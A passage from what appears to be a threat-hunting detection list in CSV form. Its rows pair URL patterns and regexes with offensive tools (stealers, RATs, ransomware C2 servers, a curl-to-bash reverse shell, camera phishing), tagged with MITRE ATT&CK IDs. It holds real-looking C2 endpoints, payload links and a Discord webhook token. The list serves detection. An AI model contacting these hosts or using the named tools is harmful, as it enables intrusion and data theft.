If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*https://avred.r00ted.ch/upload*",".{0,1000}https\:\/\/avred\.r00ted\.ch\/upload.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*https://best-wishes-to-you*",".{0,1000}https\:\/\/best\-wishes\-to\-you.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*https://bitbucket.org/evilgreyswork/*",".{0,1000}https\:\/\/bitbucket\.org\/evilgreyswork\/.{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","1","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A" "*https://browserling.com/tor-testing*",".{0,1000}https\:\/\/browserling\.com\/tor\-testing.{0,1000}","offensive_tool_keyword","browserling","proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","browserling.com","1","1","N/A","9","10","N/A","N/A","N/A","N/A" 
"*https://C2_SERVER_IP/*",".{0,1000}https\:\/\/C2_SERVER_IP\/.{0,1000}","offensive_tool_keyword","ServerlessRedirector","Serverless Redirector in various cloud vendor for red team","T1090.003 - T1095 - T1001.003","TA0010 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/KINGSABRI/ServerlessRedirector","1","0","#contentstrings","10","1","69","10","2022-12-08T08:56:02Z","2022-12-08T07:52:49Z" "*https://cdn.discordapp.com/attachments/976805447266877471/987826721250238464/c33cd7baf5e2abdf434c2793988ccb56.png*",".{0,1000}https\:\/\/cdn\.discordapp\.com\/attachments\/976805447266877471\/987826721250238464\/c33cd7baf5e2abdf434c2793988ccb56\.png.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*https://cnc.mkbot.info/alertmsg.zip*",".{0,1000}https\:\/\/cnc\.mkbot\.info\/alertmsg\.zip.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*https://cnc.mkbot.info/handshake.php*",".{0,1000}https\:\/\/cnc\.mkbot\.info\/handshake\.php.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry 
Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*https://code.kryo.se/iodine/iodine-*",".{0,1000}https\:\/\/code\.kryo\.se\/iodine\/iodine\-.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*https://crackstation.net/*",".{0,1000}https\:\/\/crackstation\.net\/.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Credential Access","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5452","618","2024-02-24T00:10:34Z","2020-06-22T21:42:16Z" "*https://curlshell:*",".{0,1000}https\:\/\/curlshell\:.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*https://curlshell:* | bash",".{0,1000}https\:\/\/curlshell\:.{0,1000}\s\|\sbash","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*https://cyseclabs.com/exploits/*",".{0,1000}https\:\/\/cyseclabs\.com\/exploits\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*https://default-password.info/*",".{0,1000}https\:\/\/default\-password\.info\/.{0,1000}","offensive_tool_keyword","default-password.info","default passwords database","T1110 - T1082","TA0006 - TA0001","N/A","N/A","Credential Access","https://default-password.info/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*https://discord.com/invite/5Hpj4Gs5SS*",".{0,1000}https\:\/\/discord\.com\/invite\/5Hpj4Gs5SS.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","1","AD Enumeration","7","9","808","82","2024-04-17T15:57:37Z","2023-09-26T12:36:59Z" "*https://dns.blokada.org/dns-query*",".{0,1000}https\:\/\/dns\.blokada\.org\/dns\-query.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*https://dns10.quad9.net:5053/dns-query*",".{0,1000}https\:\/\/dns10\.quad9\.net\:5053\/dns\-query.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*https://dnsdumpster.com/*",".{0,1000}https\:\/\/dnsdumpster\.com\/.{0,1000}","offensive_tool_keyword","dnsdumpster","dns recon & research - find & lookup dns records","T1018 - T1596.001 - T1590.002","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://dnsdumpster.com/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" "*https://drive.google.com/file/d/1WLJGs3ZUypf6hLh5WL4AJmsKdUOZo5yZ*",".{0,1000}https\:\/\/drive\.google\.com\/file\/d\/1WLJGs3ZUypf6hLh5WL4AJmsKdUOZo5yZ.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","9","7","N/A","N/A","N/A","N/A" "*https://erwan2212.github.io/NTHASH-FPC*",".{0,1000}https\:\/\/erwan2212\.github\.io\/NTHASH\-FPC.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*https://ffuf.io.fi*",".{0,1000}https\:\/\/ffuf\.io\.fi.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*https://ffuf.io/FUZZ*",".{0,1000}https\:\/\/ffuf\.io\/FUZZ.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer 
written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*https://free-399rs-jio-recharge*",".{0,1000}https\:\/\/free\-399rs\-jio\-recharge.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*https://github.com/bitsadmin/*",".{0,1000}https\:\/\/github\.com\/bitsadmin\/.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*https://github.com/curl/curl/wiki/DNS-over-HTTPS*",".{0,1000}https\:\/\/github\.com\/curl\/curl\/wiki\/DNS\-over\-HTTPS.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*https://github.com/dekrypted/*",".{0,1000}https\:\/\/github\.com\/dekrypted\/.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","github user host multiple stealers projects","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*https://github.com/m0nad/Diamorphine*",".{0,1000}https\:\/\/github\.com\/m0nad\/Diamorphine.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*https://github.com/The-Viper-One*",".{0,1000}https\:\/\/github\.com\/The\-Viper\-One.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*https://gitlab.com/kalilinux/*",".{0,1000}https\:\/\/gitlab\.com\/kalilinux\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*https://hashtoolkit.com/generate-hash/?text=*",".{0,1000}https\:\/\/hashtoolkit\.com\/generate\-hash\/\?text\=.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*https://itm4n.github.io/windows-registry-rpceptmapper-eop/*",".{0,1000}https\:\/\/itm4n\.github\.io\/windows\-registry\-rpceptmapper\-eop\/.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" 
"*https://join-zoom-online-meeting*",".{0,1000}https\:\/\/join\-zoom\-online\-meeting.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*https://kali.download/*",".{0,1000}https\:\/\/kali\.download\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*https://localhost:7443/*",".{0,1000}https\:\/\/localhost\:7443\/.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*https://mastodon.be/@username_fzihfzuhfuoz/109994357971853428*",".{0,1000}https\:\/\/mastodon\.be\/\@username_fzihfzuhfuoz\/109994357971853428.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" 
"*https://mastodon.be/username_fzihfzuhfuoz/109743339821428173*",".{0,1000}https\:\/\/mastodon\.be\/username_fzihfzuhfuoz\/109743339821428173.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*https://nemesis.*.com/api/*",".{0,1000}https\:\/\/nemesis\..{0,1000}\.com\/api\/.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*https://ntlm.pw*",".{0,1000}https\:\/\/ntlm\.pw.{0,1000}","offensive_tool_keyword","ntlm.pw","Database of NTLM hashes","T1003 - T1555 - T1558","TA0006","N/A","N/A","Credential Access","https://ntlm.pw","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*https://ntlm.pw/*",".{0,1000}https\:\/\/ntlm\.pw\/.{0,1000}","offensive_tool_keyword","NTLMSleuth","verify NTLM hash integrity against the robust database of ntlm.pw.","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/jmarr73/NTLMSleuth","1","1","N/A","8","1","7","0","2023-12-12T17:23:35Z","2023-12-12T16:41:35Z" "*https://pastebin.com/9JyjcMAH*",".{0,1000}https\:\/\/pastebin\.com\/9JyjcMAH.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" 
"*https://pastebin.com/iBeTbXCw*",".{0,1000}https\:\/\/pastebin\.com\/iBeTbXCw.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*https://pastebin.com/raw/fevFJe98*",".{0,1000}https\:\/\/pastebin\.com\/raw\/fevFJe98.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*https://proxy.duckduckgo.com/iu/?u=https://pdxkmdcepvahysnnxe.pythonanywhere.com/image.jpg?cmd=*",".{0,1000}https\:\/\/proxy\.duckduckgo\.com\/iu\/\?u\=https\:\/\/pdxkmdcepvahysnnxe\.pythonanywhere\.com\/image\.jpg\?cmd\=.{0,1000}","offensive_tool_keyword","DuckDuckC2","A proof-of-concept C2 channel through DuckDuckGo's image proxy service","T1071.001 - T1090.003","TA0011 - TA0042","N/A","N/A","C2","https://github.com/nopcorn/DuckDuckC2","1","1","N/A","10","10","69","7","2023-11-12T10:24:59Z","2023-09-23T20:00:09Z" "*https://ptb.discord.com/api/webhooks/1226217588959215726/AZaNnD4TIN-9sV-t0rsveiQxcROYaCVziI8BUa6CNPsUxdnW9mdHu7HnuQ55kQPXZ8_5*",".{0,1000}https\:\/\/ptb\.discord\.com\/api\/webhooks\/1226217588959215726\/AZaNnD4TIN\-9sV\-t0rsveiQxcROYaCVziI8BUa6CNPsUxdnW9mdHu7HnuQ55kQPXZ8_5.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" 
"*https://raw.githubusercontent.com/KasRoudra/CamHacker*",".{0,1000}https\:\/\/raw\.githubusercontent\.com\/KasRoudra\/CamHacker.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*'https://slack.com/api/channels.create'*",".{0,1000}\'https\:\/\/slack\.com\/api\/channels\.create\'.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*https://sniff.su/*.gz*",".{0,1000}https\:\/\/sniff\.su\/.{0,1000}\.gz.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*https://sniff.su/*.zip*",".{0,1000}https\:\/\/sniff\.su\/.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*https://t.me/BotFather*",".{0,1000}https\:\/\/t\.me\/BotFather.{0,1000}","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","295","48","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z" "*https://t.me/machine1337*",".{0,1000}https\:\/\/t\.me\/machine1337.{0,1000}","offensive_tool_keyword","TelegramRAT","Cross 
Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","295","48","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z" "*https://t.me/moom825*",".{0,1000}https\:\/\/t\.me\/moom825.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*https://unit259.fyi/db*",".{0,1000}https\:\/\/unit259\.fyi\/db.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*https://viperone.gitbook.io/pentest-everything*",".{0,1000}https\:\/\/viperone\.gitbook\.io\/pentest\-everything.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*https://watch-youtube-videos-live*",".{0,1000}https\:\/\/watch\-youtube\-videos\-live.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*https://weakpass.com/*",".{0,1000}https\:\/\/weakpass\.com\/.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*https://web.archive.org/*https://www.kernel-exploits.com/media/*",".{0,1000}https\:\/\/web\.archive\.org\/.{0,1000}https\:\/\/www\.kernel\-exploits\.com\/media\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*https://wfuzz.readthedocs.io*",".{0,1000}https\:\/\/wfuzz\.readthedocs\.io.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 
Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz*",".{0,1000}https\:\/\/www\.blackhillsinfosec\.com\/bypass\-anti\-virus\-run\-mimikatz.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*https://www.browserling.com/browse*",".{0,1000}https\:\/\/www\.browserling\.com\/browse.{0,1000}","offensive_tool_keyword","browserling","proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","browserling.com","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*https://www.myget.org/F/fireeye/api/v2*",".{0,1000}https\:\/\/www\.myget\.org\/F\/fireeye\/api\/v2.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*https://www.synacktiv.com/publications/ounedpy-exploiting-hidden-organizational-units-acl-attack-vectors-in-active-directory*",".{0,1000}https\:\/\/www\.synacktiv\.com\/publications\/ounedpy\-exploiting\-hidden\-organizational\-units\-acl\-attack\-vectors\-in\-active\-directory.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege 
